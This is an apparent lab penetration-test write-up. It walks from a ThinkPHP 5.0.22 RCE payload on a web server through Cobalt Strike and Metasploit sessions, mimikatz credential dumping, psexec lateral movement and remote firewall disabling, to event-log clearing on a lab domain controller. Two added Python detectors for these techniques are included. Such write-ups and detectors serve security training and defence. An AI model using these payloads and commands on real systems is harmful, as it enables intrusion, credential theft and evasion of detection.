1. Environment
Win7 + phpstudy + ThinkPHP 5.0.22 (web server, dual-homed): 192.168.1.101 and 192.168.138.136
Win2008 (domain controller): 192.168.138.138
Kali (attacking host): 192.168.1.128
2. Web penetration
Browsing to the site shows that it runs ThinkPHP 5.
![1655863865_62b27a392282ac8b40d36.png!small?1655863865439](https://image.3001.net/images/20220622/1655863865_62b27a392282ac8b40d36.png!small?1655863865439)
2.1 Directory scan
The scan shows an add.php backdoor file, but we do not have its password.
![1655863875_62b27a43a9d4649754f1a.png!small?1655863875988](https://image.3001.net/images/20220622/1655863875_62b27a43a9d4649754f1a.png!small?1655863875988)
Triggering an error page reveals the version number.
![1655863884_62b27a4cd2d8ef4dc0083.png!small?1655863885308](https://image.3001.net/images/20220622/1655863884_62b27a4cd2d8ef4dc0083.png!small?1655863885308)
2.2 ThinkPHP V5.0.22 RCE
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Here I used the RCE to read the add.php found earlier.
![1655863894_62b27a562499599968eb0.png!small?1655863906214](https://image.3001.net/images/20220622/1655863894_62b27a562499599968eb0.png!small?1655863906214)
The decrypted password is admins.
![1655863903_62b27a5fd9723dd909548.png!small?1655863906212](https://image.3001.net/images/20220622/1655863903_62b27a5fd9723dd909548.png!small?1655863906212)
I mainly wanted to play with this large webshell; writing a one-liner webshell of my own would also have worked.
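As an added defensive example (not part of the original article), the following Python scans web-server access-log lines for the ThinkPHP 5.0.x invokefunction route-injection pattern used in 2.2, catching URL-encoded variants as well. The log lines are constructed samples and the combined log format is an assumption.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed sample access-log lines in Apache/nginx combined format (not from the article).
SAMPLE_LOG = r'''
10.0.0.5 - - [22/Jun/2022:10:01:02 +0800] "GET /index.php?s=index/index/index HTTP/1.1" 200 512
10.0.0.9 - - [22/Jun/2022:10:01:09 +0800] "GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 88
10.0.0.9 - - [22/Jun/2022:10:01:15 +0800] "GET /index.php?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1 HTTP/1.1" 200 90
10.0.0.7 - - [22/Jun/2022:10:02:00 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 120
'''.strip().splitlines()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def analyze_request(target: str) -> Optional[dict]:
    """Flag the ThinkPHP 5.0.x route injection: the `s` route parameter carrying a PHP
    namespace separator (backslash) or the invokefunction method. parse_qs URL-decodes
    keys and values, so encoded variants (%5C, %2F, %5B) are caught too."""
    query = parse_qs(target.partition("?")[2], keep_blank_values=True)
    route = query.get("s", [""])[0]
    # A legitimate module/controller/action route never contains a backslash.
    if "\\" not in route and "invokefunction" not in route.lower():
        return None
    return {
        "route": route,
        "function": query.get("function", [""])[0],
        # vars[0], vars[1][] ... carry the callable and its arguments
        "vars": [v for k, vs in query.items() if k.startswith("vars") for v in vs],
    }

def scan_log(lines) -> list:
    """Return one finding per suspicious request, with source IP, timestamp and status."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        hit = analyze_request(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"), **hit})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} route={f['route']!r} function={f['function']} vars={f['vars']}")
```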
3. Post-exploitation
ipconfig /all # local IP addresses and domain membership
route print # routing table
net view # other host names on the LAN
arp -a # ARP cache
net start # running services
net share # shares enabled on this host
net share ipc$ # enable the IPC$ share
net share c$ # enable the C$ share
net use \\192.168.xx.xx\ipc$ "" /user:"" # null session to 192.168.xx.xx
net use \\192.168.xx.xx\c$ "password" /user:"username" # map the C$ share
dir \\192.168.xx.xx\c$\user # list the user directory on the C drive of 192.168.xx.xx
net config Workstation # computer name, full name, user name, OS version, workstation, domain, logon domain
net user # local user list
net user /domain # domain users
net localgroup administrators # local administrators group (usually contains domain users)
net view /domain # how many domains there are
net user <username> /domain # details of a given domain user
net group /domain # groups in the domain and how users are divided among them (only works on the DC)
net group <groupname> /domain # members of a given domain group
net time /domain # the primary domain server also acts as the time server
net group "domain admins" /domain # names of the domain administrators
net group "domain computers" /domain # other host names in the domain
net group "domain controllers" /domain # domain controllers (there may be several)
net group "Enterprise Admins" /domain # enterprise admins group
3.1 Information gathering
Check the ARP cache
![1655863920_62b27a709abd59489a42c.png!small?1655863921081](https://image.3001.net/images/20220622/1655863920_62b27a709abd59489a42c.png!small?1655863921081)
![1655863929_62b27a794b287e5df1072.png!small?1655863929683](https://image.3001.net/images/20220622/1655863929_62b27a794b287e5df1072.png!small?1655863929683)
The domain name sun.com shows up; try pinging it.
![1655863948_62b27a8c7df549160a258.png!small?1655863948994](https://image.3001.net/images/20220622/1655863948_62b27a8c7df549160a258.png!small?1655863948994)
3.2 Using CS
Upload the backdoor
![1655863960_62b27a9845f45e1058c2b.png!small?1655863960761](https://image.3001.net/images/20220622/1655863960_62b27a9845f45e1058c2b.png!small?1655863960761)
Execute it and the beacon checks in
![1655863967_62b27a9fa2c8c8ef57ae4.png!small?1655863967984](https://image.3001.net/images/20220622/1655863967_62b27a9fa2c8c8ef57ae4.png!small?1655863967984)
Privilege escalation
![1655863975_62b27aa7f0adf5fb233c0.png!small?1655863976284](https://image.3001.net/images/20220622/1655863975_62b27aa7f0adf5fb233c0.png!small?1655863976284)
![1655863989_62b27ab59070906a81d51.png!small?1655863990085](https://image.3001.net/images/20220622/1655863989_62b27ab59070906a81d51.png!small?1655863990085)
Use mimikatz to read the passwords of administrator and leo
![1655864001_62b27ac153fdd7d9d2fed.png!small?1655864001804](https://image.3001.net/images/20220622/1655864001_62b27ac153fdd7d9d2fed.png!small?1655864001804)
![1655864009_62b27ac9aa67208a74731.png!small?1655864010065](https://image.3001.net/images/20220622/1655864009_62b27ac9aa67208a74731.png!small?1655864010065)
With the credentials we can log in to hosts with psexec; this requires port 445 (IPC) to be open.
3.3 Internal network scan
Portscan <subnet> <ports> <protocol: icmp, arp or none> <threads>
![1655864017_62b27ad1d6bc27d18a6a6.png!small?1655864018365](https://image.3001.net/images/20220622/1655864017_62b27ad1d6bc27d18a6a6.png!small?1655864018365)
The target DC is found
![1655864025_62b27ad91037b552c996e.png!small?1655864025457](https://image.3001.net/images/20220622/1655864025_62b27ad91037b552c996e.png!small?1655864025457)
A firewall is in the way here and blocks inbound and outbound port traffic, so create an SMB listener instead
![1655864031_62b27adfbe7713cdd00ff.png!small?1655864032272](https://image.3001.net/images/20220622/1655864031_62b27adfbe7713cdd00ff.png!small?1655864032272)
Then use psexec64 for lateral movement
The DC checks in successfully
![1655864038_62b27ae69f5e81ac606c5.png!small?1655864039210](https://image.3001.net/images/20220622/1655864038_62b27ae69f5e81ac606c5.png!small?1655864039210)
The admin password is obtained as well
![1655864045_62b27aed5fdded1a2a556.png!small?1655864046224](https://image.3001.net/images/20220622/1655864045_62b27aed5fdded1a2a556.png!small?1655864046224)
3.4 Using MSF
Generate a listener
![1655864052_62b27af4b563742921d78.png!small?1655864053162](https://image.3001.net/images/20220622/1655864052_62b27af4b563742921d78.png!small?1655864053162)
Upload and execute; the MSF session comes in
![1655864061_62b27afd2894763cd41b4.png!small?1655864061474](https://image.3001.net/images/20220622/1655864061_62b27afd2894763cd41b4.png!small?1655864061474)
Escalate to SYSTEM
![1655864097_62b27b21803deba0cca4c.png!small?1655864098018](https://image.3001.net/images/20220622/1655864097_62b27b21803deba0cca4c.png!small?1655864098018)
Internal ARP scan
![1655864107_62b27b2b9405173a985b1.png!small?1655864108057](https://image.3001.net/images/20220622/1655864107_62b27b2b9405173a985b1.png!small?1655864108057)
Add a route into the internal network
![1655864115_62b27b33d6be84653913a.png!small?1655864116185](https://image.3001.net/images/20220622/1655864115_62b27b33d6be84653913a.png!small?1655864116185)
Start a proxy on port 7777
![1655864122_62b27b3a46bac1c7a28c0.png!small?1655864122550](https://image.3001.net/images/20220622/1655864122_62b27b3a46bac1c7a28c0.png!small?1655864122550)
Use kiwi to dump credentials
![1655864130_62b27b427996190e026ac.png!small?1655864131015](https://image.3001.net/images/20220622/1655864130_62b27b427996190e026ac.png!small?1655864131015)
Running psexec directly here fails; the firewall is the likely cause.
3.5 Disabling the DC firewall over an IPC connection
The usual approach is to turn off the DC firewall with netsh, but that needs administrator rights on the DC itself, so here we connect to the DC over IPC and then create a remotely started service that adds a rule and turns off the firewall.
netsh advfirewall firewall add rule name="f.exe" dir=in program="e:\f.exe" action=allow
netsh advfirewall firewall delete rule name="f.exe"
Establish an IPC connection to the DC
net use \\192.168.138.138\ipc$ dc123.com /user:administrator
![1655864143_62b27b4f23c4974aab340.png!small?1655864143398](https://image.3001.net/images/20220622/1655864143_62b27b4f23c4974aab340.png!small?1655864143398)
Use sc to create a service on the DC and start it immediately, turning off the DC firewall
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" # create the service
sc \\192.168.138.138 start unablefirewall # start the service immediately
![1655864154_62b27b5a649a6a0b876e2.png!small?1655864154671](https://image.3001.net/images/20220622/1655864154_62b27b5a649a6a0b876e2.png!small?1655864154671)
For some reason this reports a failure, but the command did run and the firewall was turned off.
Since the DC has no outbound internet access, create a bind (forward) listener
![1655864162_62b27b626cea0ebd1ded6.png!small?1655864162870](https://image.3001.net/images/20220622/1655864162_62b27b626cea0ebd1ded6.png!small?1655864162870)
psexec again, and the session comes in
![1655864169_62b27b6937a34917612e2.png!small?1655864169681](https://image.3001.net/images/20220622/1655864169_62b27b6937a34917612e2.png!small?1655864169681)
The admin password is obtained
![1655864178_62b27b72d832db488c141.png!small?1655864179465](https://image.3001.net/images/20220622/1655864178_62b27b72d832db488c141.png!small?1655864179465)
Go through the proxy and try a remote login
3.6 Remote login
Enable 3389
run post/windows/manage/enable_rdp
![1655864187_62b27b7bab4aae28dc1ad.png!small?1655864188213](https://image.3001.net/images/20220622/1655864187_62b27b7bab4aae28dc1ad.png!small?1655864188213)
Windows remote desktop login
![1655864195_62b27b83c6935f886d414.png!small?1655864196065](https://image.3001.net/images/20220622/1655864195_62b27b83c6935f886d414.png!small?1655864196065)
3.7 Log clearing
Built into msf
run event_manager -i
run event_manager -c
![1655864206_62b27b8e92b9bf16c590e.png!small?1655864207192](https://image.3001.net/images/20220622/1655864206_62b27b8e92b9bf16c590e.png!small?1655864207192)
Clearing via Server Manager
![1655864214_62b27b9685d8aad96462f.png!small?1655864215337](https://image.3001.net/images/20220622/1655864214_62b27b9685d8aad96462f.png!small?1655864215337)
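An added example, not from the article, that turns the post-exploitation steps above into detection logic: it triages simplified Windows event records for the domain-recon net commands and IPC$ connections of section 3, the service created remotely with sc in 3.5, and the log clearing in 3.7. The event records are constructed, and their field names are a simplified assumption rather than the real EVTX schema.

```python
import re

# Constructed, simplified Windows event records; field names are an assumption, not the EVTX schema.
# 4688 only carries CommandLine when "Include command line in process creation events" is enabled.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4688, "Host": "WIN7-WEB", "CommandLine": 'net group "domain admins" /domain'},
    {"Channel": "Security", "EventID": 4688, "Host": "WIN7-WEB", "CommandLine": "ipconfig /all"},
    {"Channel": "Security", "EventID": 4688, "Host": "WIN7-WEB", "CommandLine": r"net use \\192.168.138.138\ipc$ * /user:administrator"},
    {"Channel": "System", "EventID": 7045, "Host": "DC", "ServiceName": "unablefirewall", "ImagePath": "netsh advfirewall set allprofiles state off"},
    {"Channel": "System", "EventID": 7045, "Host": "DC", "ServiceName": "Backup Agent", "ImagePath": r"C:\Program Files\Agent\agent.exe"},
    {"Channel": "Security", "EventID": 1102, "Host": "DC"},
    {"Channel": "System", "EventID": 104, "Host": "DC"},
]

DOMAIN_RECON = re.compile(r"\bnet\s+(group|user|view|time)\b.*\s/domain\b", re.I)
IPC_CONNECT = re.compile(r"\bnet\s+use\s+\\\\\S+\\(ipc|c)\$", re.I)
FIREWALL_OFF = re.compile(r"netsh\s+advfirewall\s+set\s+\S+\s+state\s+off", re.I)

def triage(event: dict):
    """Return (rule, detail) when the event matches one of the walkthrough's TTPs, else None."""
    ch, eid = event["Channel"], event["EventID"]
    if ch == "Security" and eid == 4688:           # process creation with command line
        cmd = event.get("CommandLine", "")
        if DOMAIN_RECON.search(cmd):
            return ("domain_recon", cmd)
        if IPC_CONNECT.search(cmd):
            return ("ipc_share_connect", cmd)
    elif ch == "System" and eid == 7045:           # a new service was installed
        path = event.get("ImagePath", "")
        # A service whose "binary" is a netsh one-liner, or has no binary at all, is the
        # remote `sc create ... binpath=` trick from 3.5, not a legitimate service.
        if FIREWALL_OFF.search(path) or not re.search(r"\.(exe|sys)\b", path, re.I):
            return ("service_install_nonbinary", f"{event.get('ServiceName')}: {path}")
    elif (ch, eid) in (("Security", 1102), ("System", 104)):   # audit / event log cleared
        return ("event_log_cleared", f"{ch} log cleared on {event['Host']}")
    return None

def triage_all(events):
    """Run triage over a batch and keep only the hits as (host, rule, detail)."""
    return [(e["Host"], *hit) for e in events if (hit := triage(e))]

if __name__ == "__main__":
    for host, rule, detail in triage_all(SAMPLE_EVENTS):
        print(f"[{host}] {rule}: {detail}")
```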
Author: 山石网科. Please credit FreeBuf.COM when reprinting.